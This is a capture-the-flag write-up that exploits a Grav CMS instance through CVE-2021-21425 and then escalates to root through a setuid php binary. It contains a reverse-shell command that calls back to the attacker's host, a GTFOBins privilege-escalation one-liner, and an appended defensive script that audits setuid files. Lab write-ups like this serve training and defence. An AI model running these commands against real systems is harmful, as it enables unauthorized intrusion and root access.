# CTF1

## Recon (Enumeration)

### Nmap

<img src="https://3782874468-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMIrXd5DOkisCnhbTwXRy%2Fuploads%2FDRNhA8iUiSfGCZZdRHuq%2Fimage.png?alt=media&#x26;token=22c1860e-3f49-4bcb-9632-a415d3875fc7" alt="" data-size="original">

`nmap --min-rate 3000 -p- 192.168.115.12 -Pn -sV -sC`

We find only two ports open.

#### Port 80 (HTTP)

<img src="https://3782874468-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMIrXd5DOkisCnhbTwXRy%2Fuploads%2Fr5a6o35gzHSJjlzqIKZe%2Fimage.png?alt=media&#x26;token=09a5e9a2-2eda-48a5-a015-c19c6e8a825c" alt="" data-size="original">

Seems to have a folder exposed to us.

![](https://3782874468-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMIrXd5DOkisCnhbTwXRy%2Fuploads%2FOHG0MbUE5PB1ZbSd7sq3%2Fimage.png?alt=media\&token=867182cf-d21e-41b5-bf69-d212ec3fb138)

It seems like some sort of CMS, though I have no idea what this is.

Let's see if we can find a version number and whether there are any RCEs associated with "Grav".

While doing some research I came across the following article, which leads me to /admin.

{% embed url="<https://pentest.blog/unexpected-journey-7-gravcms-unauthenticated-arbitrary-yaml-write-update-leads-to-code-execution/>" %}

Based on that article I was able to seemingly replicate the POC of the RCE.

![](https://3782874468-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMIrXd5DOkisCnhbTwXRy%2Fuploads%2FQQraV9uFf0tQeUlCLyRd%2Fimage.png?alt=media\&token=3e4e6d7d-29e8-49f7-8384-f3bc81873dbd)

As a reminder the admin nonce is a hidden field in the form.

So given a 200, I suppose this CMS is vulnerable.

After doing a little bit more research, I found a POC online: <https://github.com/CsEnox/CVE-2021-21425/blob/main/exploit.py>

After a little bit of fiddling around I ran the following command. For the Ub3r Lazy: <https://www.revshells.com/>

```
python3 exploit.py -c "sh -i >& /dev/tcp/192.168.49.115/12345 0>&1" -t http://192.168.115.12/grav-admin 
```

<img src="https://3782874468-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMIrXd5DOkisCnhbTwXRy%2Fuploads%2FFAdqfzzHlCv3s1AMRnSl%2Fimage.png?alt=media&#x26;token=6724c7e3-9997-42d7-adb0-2bd6497fc966" alt="" data-size="original">

and...

We have a Shell!

![](https://3782874468-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMIrXd5DOkisCnhbTwXRy%2Fuploads%2Fe1p5POnlcw3C7nKCWihb%2Fimage.png?alt=media\&token=407a88be-2e3e-4ecb-9122-769862e0fae7)

After running linpeas we find a few interesting pieces of information.

![](https://3782874468-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMIrXd5DOkisCnhbTwXRy%2Fuploads%2FHKJL3VuWMDDCOflhzU77%2Fimage.png?alt=media\&token=6d99efed-b6ba-44f6-826d-87220b8e9a9a)

I attempted to priv esc with cron jobs but no luck.

After more recon I discovered a password hash.

![](https://3782874468-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMIrXd5DOkisCnhbTwXRy%2Fuploads%2Fu8lq5jgMimeiTh3MyWuK%2Fimage.png?alt=media\&token=1672816f-dc51-4450-813b-7c50cf2d7fd3)

After spending many hours trying to crack this hash, it was pointless.

### Privilege Escalation

For some reason I circled back and decided to look for SUID binaries manually, because why not?

So here is my frustration:

ALWAYS CHECK SUID BINARIES MANUALLY.

ALWAYS.

ALWAYS.

ALWAYS.

IDC WHAT YOU SAY. MANUAL.

FML

Anyway here is a link to that:

{% embed url="<https://blog.creekorful.org/2020/09/setuid-privilege-escalation/#finding-vulnerable-executables>" %}

![](https://3782874468-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMIrXd5DOkisCnhbTwXRy%2Fuploads%2F0TEinYs1LMY5pxlYSnwp%2Fimage.png?alt=media\&token=c509ffeb-cf19-49a7-a131-fca0dfe35142)

We notice that `/usr/bin/php7.4` stands out.

We find where the binary is: `/usr/bin/`.

And based on GTFOBins we can just run `./php -r "pcntl_exec('/bin/sh', ['-p']);"`.

I'm still kind of mad... linpeas didn't pick it up.
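The lesson from this box is that an automated enumerator can miss a setuid interpreter, so the check is worth scripting yourself. The script below is an added example written for this writeup, not something from the original post or from linpeas: it lists every setuid file under a directory tree and flags the ones whose names look like interpreters or known shell-escape binaries (php, python, perl, vim, find and so on), while leaving expected setuid helpers such as `passwd` marked `ok`. The list of suspect names is an assumption for illustration, not a complete catalogue, and the directory argument (normally `/`) is yours to choose. The same logic works as a defender's cron or CI check: a non-zero count means a setuid bit has appeared on something that should never carry one.

```shell
#!/bin/sh
# Added example (not part of the original writeup): a small SUID audit that
# finds setuid files under a directory tree and flags interpreters and other
# binaries that GTFOBins-style shell escapes rely on (the php7.4 case above).

# list_suid DIR : print one path per line for every setuid regular file under DIR.
# -xdev keeps the search on one filesystem so /proc and network mounts are skipped.
list_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# is_suspect NAME : exit 0 if the basename NAME is an interpreter or a binary
# that is trivially abusable when setuid. The pattern list is an assumption for
# illustration; extend it to match your own baseline.
is_suspect() {
    case "$1" in
        php*|python*|perl*|ruby*|node|lua*|bash|sh|dash|zsh|vim|vi|nano|find|awk|gawk|env|busybox)
            return 0 ;;
    esac
    return 1
}

# audit_suid DIR : print "SUSPECT <path>" or "ok <path>" for each setuid file.
audit_suid() {
    list_suid "$1" | while IFS= read -r f; do
        if is_suspect "$(basename "$f")"; then
            printf 'SUSPECT %s\n' "$f"
        else
            printf 'ok %s\n' "$f"
        fi
    done
}

# count_suspect DIR : number of suspect setuid files under DIR (prints 0 when clean).
# grep -c exits 1 on zero matches, so "|| true" keeps the function usable under set -e.
count_suspect() {
    audit_suid "$1" | grep -c '^SUSPECT ' || true
}

# Usage (as root for a full view): audit_suid / ; [ "$(count_suspect /)" = 0 ] || echo "setuid drift!"
```

Run it as root if you want a complete picture, since `find` cannot stat directories you are not allowed to read; as an unprivileged user it still shows exactly what an attacker with the same shell would see, which is the view that mattered on this box.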

![](https://3782874468-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMIrXd5DOkisCnhbTwXRy%2Fuploads%2FNc6H4IUTXNkZU7TeaMNg%2Fimage.png?alt=media\&token=21fcd97c-e72f-4a95-b6c5-54a06f410a80)
